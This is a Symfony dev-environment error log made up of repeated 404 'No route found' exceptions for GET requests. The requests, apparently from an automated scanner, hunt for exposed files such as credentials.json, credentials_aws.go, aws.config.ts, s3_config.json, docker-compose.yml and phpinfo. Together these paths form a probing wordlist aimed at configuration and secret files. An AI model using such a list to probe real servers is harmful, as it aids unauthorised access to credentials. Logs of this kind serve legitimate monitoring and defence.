[2025-12-20 20:21:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/staging.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/staging.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:22:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/test.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/test.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:22:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config_tmp.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config_tmp.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:22:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs/application.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs/application.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:22:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs/aws.config.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs/aws.config.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:22:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs/s3_config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs/s3_config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:23:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configuration.json.dist"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configuration.json.dist\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /constants.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /constants.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /constants.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /constants.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:23:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /constants.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /constants.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /constants.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /constants.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:23:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials.csv"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials.csv\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:23:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:24:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:24:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:24:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:24:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:24:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials_aws.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials_aws.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:24:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /data/credentials.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /data/credentials.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:24:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /default.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /default.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:24:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /defaults.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /defaults.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:27:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /docker-compose.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /docker-compose.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:27:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /elasticsearch.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /elasticsearch.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:27:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /emailconfig.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /emailconfig.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:27:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /frontend_dev.php/$"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /frontend_dev.php/$\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:27:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /helper/helper.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /helper/helper.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:28:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /heroku.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /heroku.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:28:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /hosting.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /hosting.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:28:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:28:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.php/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.php/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:28:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:29:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /insta-compose.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /insta-compose.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:29:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /launchSettings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /launchSettings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:30:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /main.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /main.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:30:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /manifest.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /manifest.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:30:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /manifest.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /manifest.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:30:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /meteor.settings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /meteor.settings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:30:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /minio.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /minio.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:30:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /minio.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /minio.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:30:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /model/config.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /model/config.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:30:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /myproject/settings.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /myproject/settings.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /netlify.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /netlify.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:31:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /notes.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /notes.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:31:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
